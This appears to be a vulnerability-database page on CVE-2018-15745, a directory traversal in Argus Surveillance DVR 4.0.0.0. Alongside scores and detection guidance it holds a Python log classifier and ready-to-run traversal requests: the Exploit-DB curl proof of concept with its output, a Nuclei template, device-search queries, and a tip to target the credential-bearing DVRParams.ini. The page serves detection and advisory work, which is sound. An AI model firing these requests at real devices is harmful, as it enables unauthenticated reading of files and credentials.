CVE-2018-15745
Published: 2018-08-30
Priority: P2 · 73 · high · 7.5 (CVSS 3.0)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
Tags: ITW, EXPLOIT
Exploited in the wild
EPSS: 97.71% (99.9th percentile)
Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| argussurveillance | dvr | — | — |
Detection & IOCs (extracted from sources)

url: /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
command: ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini
sigma:

```yaml
id: CVE-2018-15745
info:
  name: Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
http:
  - method: GET
    path:
      - "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "for 16-bit app support"
          - "[drivers]"
        condition: and
      - type: status
        status:
          - 200
```

- Detect exploitation attempts by matching HTTP GET requests to /WEBACCOUNT.CGI containing the traversal sequence ..%2F in the RESULTPAGE parameter, particularly on port 8080.
- Alert on HTTP 200 responses to /WEBACCOUNT.CGI traversal requests whose body contains both 'for 16-bit app support' and '[drivers]', confirming successful file read of Windows\system.ini.
- Monitor for access to DVRParams.ini via directory traversal, as this file is a high-value target on Argus DVR systems and may expose additional credentials or vulnerabilities.
- Use Shodan/FOFA queries to identify exposed Argus DVR instances: shodan-query 'http.title:"web viewer for samsung dvr"' and fofa-query 'title="web viewer for samsung dvr"'.

- The vulnerability affects only Argus Surveillance DVR version 4.0.0.0 and the product has never received a patch, meaning all deployed instances remain vulnerable.
- The traversal is unauthenticated — no credentials are required (WEBACCOUNTID and WEBACCOUNTPASSWORD are empty), so network-level access to port 8080 is sufficient for exploitation.
- This is a Windows-based application; traversal payloads should target Windows file paths (e.g., Windows\system.ini, C:\ProgramData\...) rather than Unix-style paths.
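The first two detection points above, written as log-analysis logic. This is an added example, not code from the page's sources; it assumes combined-format access logs, and its function names and sample data are constructed. It goes beyond the literal ..%2F match by also normalising backslashes and nested percent-encoding before looking for a `..` path segment.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request and status fields of a combined-format access log line (assumed format).
REQ_RE = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Strings the page's template uses to confirm Windows\system.ini was returned.
BODY_MARKERS = ("for 16-bit app support", "[drivers]")

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so nested encodings normalise to one form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal_attempt(uri):
    """True when RESULTPAGE on /WEBACCOUNT.CGI contains a '..' path segment."""
    parts = urlsplit(uri)
    if parts.path.upper() != "/WEBACCOUNT.CGI":
        return False
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.upper() != "RESULTPAGE":
            continue
        segments = fully_decode(value).replace("\\", "/").split("/")
        if ".." in segments:
            return True
    return False

def classify(log_line, body=""):
    """Return 'none', 'attempt' or 'confirmed' for one request/response pair."""
    m = REQ_RE.search(log_line)
    if not m or not is_traversal_attempt(m["uri"]):
        return "none"
    leaked = m["status"] == "200" and all(s in body for s in BODY_MARKERS)
    return "confirmed" if leaked else "attempt"

# Constructed sample data (documentation IP range), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1 HTTP/1.1" 200 219',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /webaccount.cgi?RESULTPAGE=..%255C..%255CWindows%255Csystem.ini HTTP/1.1" 404 0',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=index.html&USEREDIRECT=1 HTTP/1.1" 200 512',
]
SAMPLE_BODY = "; for 16-bit app support\n[386Enh]\nwoafont=dosapp.fon\n[drivers]\nwave=mmdrv.dll\n"

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line, SAMPLE_BODY), "<-", line.split('"')[1])
```

`classify` needs the response body to reach `confirmed`; with access logs alone it reports `attempt`, which is still worth alerting on because the request is unauthenticated.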
CVSS provenance
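| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |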
Exploit-DB
Argus Surveillance DVR 4.0.0.0 - Directory Traversal
exploitdb·2018-08-29
---
# Exploit: Argus Surveillance DVR 4.0.0.0 - Directory Traversal
# Author: John Page (aka hyp3rlinx)
# Date: 2018-08-28
# Vendor: www.argussurveillance.com
# Software Link: http://www.argussurveillance.com/download/DVR_stp.exe
# CVE: N/A
# Description:
# Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal,
# leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
# PoC
curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
# Result:
; for 16-bit app support
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON
Metasploit
Argus Surveillance DVR 4.0.0.0 - Directory Traversal
metasploit·CVSS 7.5
This module leverages an unauthenticated arbitrary file read for the Argus Surveillance 4.0.0.0 system, which has never seen an update since. As this is a Windows-related application, we recommend looking for common Windows file locations, especially C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini, which houses another vulnerability in the Argus Surveillance system. This directory traversal vulnerability is being tracked as CVE-2018-15745.
Nuclei
Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
nuclei·CVSS 7.5
Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
Template:
```yaml
id: CVE-2018-15745
info:
  name: Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
  author: gy741
  severity: high
  description: |
    Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server.
  remediation: |
    Upgrade to a patched version of Argus Surveillance DVR.
  reference:
    - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVE
```

References

- http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
- http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html
- https://www.exploit-db.com/exploits/45296/